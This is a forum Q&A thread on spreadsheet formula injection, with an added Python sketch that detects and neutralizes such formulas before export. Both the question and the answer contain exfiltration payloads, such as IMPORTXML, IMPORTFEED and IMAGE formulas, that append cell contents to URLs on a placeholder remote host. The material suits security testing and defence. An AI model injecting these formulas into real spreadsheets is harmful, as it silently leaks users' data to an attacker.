
I need to extract data from inside an Excel file using Excel 2007 functions.

The concept is somewhat related to stored XSS type of data exfiltration only that I need to use Excel 2007 functions (which I managed to inject in the file cells) in order to make the user automatically load an image, web path or make a DNS request.

Until now I have tried the following, but they failed because the Excel file is rendered in PHP with Excel 2007 functions:

  • =IMPORTDATA(CONCATENATE("https://example.com/", C2))
  • =WEBSERVICE(CONCATENATE("https://example.com/", C2))

I have successfully injected:

  • =HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")

But in this manner I have to trick a user into opening the link themselves (not impossible, but no fun :D).

Anders
Lucian Nitescu

1 Answer


After a few trials and errors, I have managed to extract data, and I also find the following article one of the most comprehensive resources for data exfiltration using Excel formulas:

https://www.notsosecure.com/data-exfiltration-formula-injection/

CONCATENATE: Appends strings to one another.

=CONCATENATE(A2:E2)

IMPORTXML: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.

=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")

IMPORTFEED: Imports a RSS or ATOM feed.

=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))

IMPORTHTML: Imports data from a table or list within an HTML page.

=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)

IMPORTRANGE: Imports a range of cells from a specified spreadsheet.

=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")

IMAGE: Inserts an image into a cell.

=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")

Lucian Nitescu
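For the application that generates the spreadsheet, the formulas discussed in this thread can be flagged and neutralized before export. The sketch below is an added example, not part of either post: the function names and sample rows are hypothetical, and the single-quote prefix is the commonly recommended formula-injection mitigation, applied here on the assumption that cell values are user-controlled strings.

```python
import re

# Functions named on this page that make the spreadsheet client fetch a URL
# (or, for HYPERLINK, build a link the user can be tricked into clicking).
OUTBOUND_FUNCS = ("IMPORTDATA", "WEBSERVICE", "HYPERLINK", "IMPORTXML",
                  "IMPORTFEED", "IMPORTHTML", "IMPORTRANGE", "IMAGE")
FUNC_RE = re.compile(r"\b(" + "|".join(OUTBOUND_FUNCS) + r")\s*\(", re.IGNORECASE)
# Leading characters that make a spreadsheet treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula(value: str) -> bool:
    """True if the cell text would be evaluated rather than shown as text."""
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize(value: str) -> str:
    """Prefix a single quote so the cell is stored as literal text."""
    return "'" + value if is_formula(value) else value


def audit(rows):
    """Return (row, col, function) for formula cells calling an outbound function."""
    hits = []
    for r, row in enumerate(rows, start=1):
        for c, cell in enumerate(row, start=1):
            if isinstance(cell, str) and is_formula(cell):
                for m in FUNC_RE.finditer(cell):
                    hits.append((r, c, m.group(1).upper()))
    return hits


# Constructed sample rows: user-supplied values headed for an export.
SAMPLE = [
    ["name", "note"],
    ["alice", '=HYPERLINK(CONCATENATE("https://example.com/",C2), "x")'],
    ["bob", "-5 degrees"],
    ["carol", '=IMAGE("https://example.com/logo.png")'],
    ["dave", "see IMAGE(1) in the manual"],
]

if __name__ == "__main__":
    for hit in audit(SAMPLE):
        print("outbound formula at row %d col %d: %s" % hit)
    print([[neutralize(c) for c in row] for row in SAMPLE])
```

Neutralizing also rewrites harmless values such as "-5 degrees"; that is the usual trade-off of prefix-based escaping, and the audit output can be logged separately to spot injection attempts.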